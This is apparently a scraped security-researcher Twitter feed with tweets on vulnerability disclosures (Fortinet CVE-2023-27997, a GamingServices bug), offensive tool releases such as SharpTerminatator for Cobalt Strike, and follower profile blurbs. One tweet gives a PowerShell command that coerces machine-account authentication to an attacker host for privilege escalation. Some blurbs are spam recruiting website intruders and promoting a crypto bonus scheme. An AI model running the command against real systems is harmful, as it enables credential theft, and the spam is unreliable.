So MSRC first say that they cannot reproduce ,now say that no security boundary is crossed. Tested this on few different machines and it was successful on all of them.
This is bug in GamingServices , non default service so impact is not high.
github.com/Wh04m1001/Gami…
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵
Hi @ReolinkTech, please send me the source code for the Lumus, C1-Pro and C2-Pro cameras that I own. You use GPL licensed software in your products which requires you to provide the source code upon request.
Many thanks.
A new version of pywerview has been released! The tool can now work against DC with Channel Binding and LDAP Signing. s/o @rouge_cravategithub.com/the-useless-on…
🌻
Official confirmation from Microsoft that there is no supported way to rotate nor change DPAPI backup keys!
Compromised keys? ➡️ Burn the domain and rebuild a new one 💥
wifite2 v2.7.0 released.
Supports newest, rewritten hcxdumptool, cOWPatty is working again and allows airodump-ng to exit (running in bg mode). Enjoy 🙂
github.com/kimocoder/wifi…
SharpTerminatator is a C# port of ZeroMemoryEx's art piece called Terminator. It can be used with Cobalt Strike's execute-assembly or as a standalone executable.
All hail goes to him.
and ofcourse spyboy :)
github.com/mertdas/SharpT…
#Fortinet published a patch for CVE-2023-27997, the Remote Code Execution vulnerability @DDXhunter and I reported. This is reachable pre-authentication, on every SSL VPN appliance. Patch your #Fortigate. Details at a later time. #xortigate
The critical #Fortinet#CVE-2022-42475 has made quite a buzz, and we’ve documented how you can create an #exploit targeting a single specific FortiGate appliance running a single specific version of FortiOS. bfx.social/3C3gdg8
4 Followers 100 FollowingRecruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/A1ESBIeFt0
33 Followers 3K FollowingVirtual currency game platform, deposit and get 50% bonus, recruit agents to earn 100,000 USDT per month, contact us https://t.co/j3jdAz4niL
31 Followers 1K FollowingWhen you trust anyone unreservedly, there will only be two consequences in the end, either the person in your life or a lesson in your life.
101 Followers 1K FollowingEntusiasta em criptomoedas.
''A maioria das pessoas associa dinheiro a prazer imediato. Para mim, ele deve ser acumulado para proporcionar liberdade''
#bitcoin
12K Followers 490 FollowingSr. Penetration Tester / Red Team Operator @ptswarm :: Author of the Pentester’s Promiscuous Notebook :: He/him :: Tweets’re my pwn 🐣
1K Followers 3 FollowingWillkommen auf der twitter-Seite des MPS, das größte reisende Mittelalter Kultur Festival der Welt. Weitere Infos unter http://t.co/irfqsIM4Kl
1K Followers 11 FollowingThe Open Home Foundation fights for the fundamental principles of privacy, choice, and sustainability for smart homes. And for every person who lives in one.
5K Followers 316 FollowingSecurity but not as in "national security". Playing CTFs with @redrocket_ctf (and @Sauercl0ud). Pwn2Own Vancouver 2020..=2024\{2023}. @[email protected]
37K Followers 183 FollowingNuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
48K Followers 452 FollowingSecurity researcher with a focus on hardware & firmware. I occasionally publish stuff on YouTube. Co-founder of @hextreeio. Contact: [email protected]
5K Followers 181 FollowingSenior Security Researcher @akamai - Malicious Group - SRT - DoD researcher of the year 2022 - Top 10 web attacks 2023 - CRTO - MSRC Top 75 in Q1/Q2 2025